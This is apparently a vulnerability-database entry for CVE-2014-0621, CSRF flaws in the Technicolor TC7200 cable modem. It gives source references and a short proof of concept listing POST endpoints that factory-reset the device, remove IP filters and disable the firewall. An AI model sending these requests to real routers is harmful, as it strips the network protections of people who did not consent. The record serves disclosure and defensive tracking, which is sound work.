ID
VAR-E-201401-0124
CVE
| cve_id: | CVE-2014-0621 | Trust: 2.4 |
EDB ID
30667
TITLE
Technicolor TC7200 - Multiple Cross-Site Request Forgery Vulnerabilities - Hardware webapps Exploit
Trust: 0.6
DESCRIPTION
Technicolor TC7200 - Multiple Cross-Site Request Forgery Vulnerabilities. CVE-2014-0621CVE-101731CVE-101730CVE-101729CVE-101728 . webapps exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | technicolor | model: | tc7200 | scope: | - | version: | - | Trust: 2.1 |
| vendor: | technicolor | model: | tc7200 std6.01.12 | scope: | - | version: | - | Trust: 0.3 |
EXPLOIT
# Exploit Title: Technicolor TC7200 - Multiple CSRF Vulnerabilities
# Google Dork: N/A
# Date: 02-01-2013
# Exploit Author: Jeroen - IT Nerdbox
# Vendor Homepage:
http://www.technicolor.com/en/solutions-services/connected-home/modems-gatew
ays/cable-modems-gateways/tc7200-tc7300
# Software Link: N/A
# Version: STD6.01.12
# Tested on: N/A
# CVE : CVE-2014-0621
#
# Proof of Concept:
#
#
## Payload for Factory Reset:
#
# POST : http://<ip>/goform/system/factory
# Parameter: None
#
## Payload to disable the advanced options:
#
# POST : http://<ip>/goform/advanced/options
# Parameter: None
#
## Payload to remove ip-filters:
#
# POST : http://<ip>//goform/advanced/ip-filters
# Parameter: IpFilterAddressDelete1 = 1
#
## Payload to remove firewall settings
#
# POST : http://<ip>/goform/advanced/firewall
# Parameter: cbFirewall = 1
#
# Check out the video at: http://www.nerdbox.it/technicolor-tc7200-multiple-csrf-vulnerabilities/
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Multiple Cross-Site Request Forgery Vulnerabilities
Trust: 1.0
TAGS
| tag: | exploit | Trust: 0.5 |
| tag: | vulnerability | Trust: 0.5 |
| tag: | csrf | Trust: 0.5 |
CREDITS
Jeroen - IT Nerdbox
Trust: 0.6
EXTERNAL IDS
| db: | NVD | id: | CVE-2014-0621 | Trust: 2.4 |
| db: | EXPLOIT-DB | id: | 30667 | Trust: 1.6 |
| db: | EDBNET | id: | 52300 | Trust: 0.6 |
| db: | PACKETSTORM | id: | 124649 | Trust: 0.5 |
| db: | BID | id: | 64668 | Trust: 0.3 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2014-0621 | Trust: 2.1 |
| url: | https://www.exploit-db.com/exploits/30667/ | Trust: 0.6 |
| url: | http://www.nerdbox.it/technicolor-tc7200-multiple-csrf-vulnerabilities/ | Trust: 0.3 |
| url: | http://www.technicolor.com/en/solutions-services/connected-home/modems-gateways/cable-modems-gateways/tc7200-tc7300 | Trust: 0.3 |
SOURCES
| db: | BID | id: | 64668 |
| db: | PACKETSTORM | id: | 124649 |
| db: | EXPLOIT-DB | id: | 30667 |
| db: | EDBNET | id: | 52300 |
LAST UPDATE DATE
2022-07-27T09:18:51.225000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 64668 | date: | 2014-01-02T00:00:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 64668 | date: | 2014-01-02T00:00:00 |
| db: | PACKETSTORM | id: | 124649 | date: | 2014-01-02T15:02:22 |
| db: | EXPLOIT-DB | id: | 30667 | date: | 2014-01-03T00:00:00 |
| db: | EDBNET | id: | 52300 | date: | 2014-01-03T00:00:00 |